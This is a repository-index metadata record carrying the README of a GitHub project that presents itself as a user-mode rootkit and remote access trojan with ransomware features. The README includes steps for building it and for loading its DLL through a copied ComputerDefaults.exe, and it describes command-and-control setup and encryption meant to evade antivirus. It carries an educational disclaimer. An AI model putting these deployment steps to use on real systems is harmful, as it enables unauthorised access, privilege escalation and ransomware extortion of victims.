{"id":23708515,"url":"https://github.com/provrb/react","last_synced_at":"2025-09-03T14:32:58.824Z","repository":{"id":255799010,"uuid":"853118124","full_name":"provrb/react","owner":"provrb","description":"Remote Elevation and Persistence Access Control Technique. User mode rootkit that takes advantage of System32 mock directory and DLL Hijacking. Created for education purposes and not to be distributed.","archived":false,"fork":false,"pushed_at":"2024-12-19T21:13:03.000Z","size":101401,"stargazers_count":3,"open_issues_count":2,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-19T22:32:54.231Z","etag":null,"topics":["dll","malware","rat","rootkit","trojan","virus","windows"],"latest_commit_sha":null,"homepage":"https://provrb.github.io/react/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/provrb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-06T03:02:09.000Z","updated_at":"2024-12-19T21:13:06.000Z","dependencies_parsed_at":"2024-12-19T22:41:58.273Z","dependency_job_id":null,"html_url":"https://github.com/provrb/react","commit_stats":null,"previous_names":["provrb/logicgate","provrb/logicgate-rootkit","provrb/react"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/provrb","download_url":"https://codeload.github.com/provrb/react/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":231895815,"owners_count":18442361,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dll","malware","rat","rootkit","trojan","virus","windows"],"created_at":"2024-12-30T17:57:14.513Z","updated_at":"2024-12-30T17:57:21.001Z","avatar_url":"https://github.com/provrb.png","language":"C","readme":"# React (acronym)\n_This project has a write-up with it. View it [here](https://provrb.github.io/Logicgate-Rootkit/)_\n\nReact, Remote Elevation and Persistence Access Control Technique,\nis a user-mode RAT rootkit that elevates to Trusted Installer privileges by using DLL hijacking\nand a System32 mock directory. Requests over sockets to and from remote hosts are encrypted using RSA\nto obfuscate reverse engineering and anti-viruses monitoring network traffic. Commands can be sent from\nthe command-and-control server to remote hosts, these commands will be performed on the clients machine.\n- Includes ransomware functionality. Encrypt files using uniquely generated 2048 RSA bit keys\nfor each client, and save them in a JSON file with the client machine GUID as the key index.\n    \n# Installing\nHow to install the source code for the project in a couple different ways.\n\n### Using GitHub.com Website\nTo install the source using the GitHub website, simply visit the repository link (https://github.com/provrb/Logicgate-Rootkit)\nand click the green 'Code' button at the top of the page, afterwards click 'Download ZIP'. Your download should be started.\nOnce downloaded as a ZIP, unpack the folder 'Logicgate-Rootkit' to a spot on your computer. You now have \ndownloaded the source code for the project. \n\n### Using the Command Line\nTo install using the command line, Firstly open your terminal or command prompt\nand navigate to a path somewhere on your computer where you would like to save the source code.\nAfterwards, simply clone the repository using this link. https://github.com/provrb/Logicgate-Rootkit.git \nYou can run the command below to do this.\n\n```\ngit clone https://github.com/provrb/Logicgate-Rootkit.git\n```\n\nFinally, the source code should be saved in a folder 'Logicgate-Rootkit' to the path \nyou were located in your command prompt.\n\n# Building\nInstructions for building the client DLL and server executable with Visual Studio only.\n\n**Visual Studio is recommended when building. This application has only ever been built with Visual Studio.**\n\n### Using Visual Studio\nWith the source code for the project downloaded, open the 'DLL.sln' file.\nThis should load the project solution. Afterwards, choose your configuration,\neither 'Client' or 'Server', and then navigate to Build -\u003e Build Solution.\n\nIf you built the CLIENT configuration, the client DLL will be located in 'out/x64/Client/'\nIf you built the SERVER configuration, the server executable will be located in 'out/x64/Server/'\n\n# Runnning\nInstructions for running the client DLL and the server executable\n\n### Client DLL\nSince the Client DLL was meant to be shipped taking advantage of ComputerDefaults.exe,\nthis DLL is meant to be loaded by ComputerDefaults.exe.\n\nTake a copy of this executable at 'C:\\Windows\\System32\\ComputerDefaults.exe'.\nPlace this copy in the same directory as your Client DLL. **Do NOT rename this file, otherwise it won't be \nrecognized and loaded by the executable'**.\nOnce the two are in the same directory, you can run ComputerDefaults.exe.\n\n### Server EXE\n**Important: You must port-forward the ports you create the server with in ServerMain.cpp**\n\nThe server is much more simple to run. As it is an executable, you can simply build it,\nand run the Server.exe file. The TCP server will be created on your defined port, default 5454,\nand will also be listening for UDP messages on port 4820. \n\n# Configuration\nInstructions on configuring the server, and commands such as TCP port, TCP ddns to use, etc..\n**Important: To run the server, you must port-forward the ports defined in the creation of any server.**\n\nYou can configure server settings the TCP server will follow by modifying m_Config in ServerInterface.h.\nThe config will look something like\n\n```c++\nstruct {\n    std::string serverStatePath      \n    std::string serverStateFilename  \n    std::string serverStateFullPath  \n    std::string serverConfigPath     \n    std::string serverConfigFilename \n    std::string serverConfigFilePath \n    std::string domainName         \n    const UINT  maxConnections        \n    long        TCPPort               \n    long        UDPPort              \n    const UINT  keepAliveIntervalMs     \n    const UINT  keepAliveTimeoutMs    \n} m_Config;\n```\n\n### Config Values Meaning\n```\nserverStatePath:      The path to save the JSON file containing information about the server, created on startup, and used by the server.\nserverStateFilename:  The name of the JSON file to save server info.\nserverStateFullPath:  Do not modify unless you know what you are doing.\nserverConfigPath:     WIP. Reserved.\nserverConfigFilename: WIP. Reserved.\nserverConfigFilePath: Do not modify unless you know what you are doing.\ndomainName:           Reference to DNS_NAME in Client.h. Do not modify.\n                      - To modify, instead change the DNS_NAME variable in Client.h to\n                        your desired DNS. You can set a free DNS up with no-ip.com!\nmaxConnections:       The max amount of connections the TCP server can have at once\nTCPPort:              Read only. TCP port that you created the TCP server with.\n                      - You can customize the TCP port you run the server with\n                        by providing different arguments to the ServerInterface constructor\n                        in ServerMain.cpp!\nUDPPort:              Read only. UDP port that you are listening on and created the server with.\n                      - You can customize the UDP port you run the server with\n                        by providing different arguments to the ServerInterface constructor\n                        in ServerMain.cpp!\nkeepAliveIntervalMs:  How often to send keep-alive packets to your clients to prevent them from disconnecting.\nkeepAliveTimeoutMs:   The time to wait for a keep-alive packet to be echo'd from the client before concluding a dead client.\n```\n\n# Commands\nDescriptions on commands you can perform on remote hosts.\n\n# Ethical Concerns\nThis project was made to demonstrate privilege escalation, DLL hijacking, and remote access\ntechniques. \n\nWhile this project is released under the MIT license, executing or misusing\nthis Software can lead to severe legal consequences. This Software is intended solely for\neducational purposes, research, and was tested in secure, controlled environments. \n\nThe Software should **never** be used for malicious purposes. Deploying the Software on unauthorized\nsystems without consent is illegal and unethical. The author holds no responsibility\nfor any damages caused by the use of this Software on unauthorized systems, or in environments\nwhere explicit permission from the system owner has not been granted.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprovrb%2Freact","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprovrb%2Freact","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprovrb%2Freact/lists"}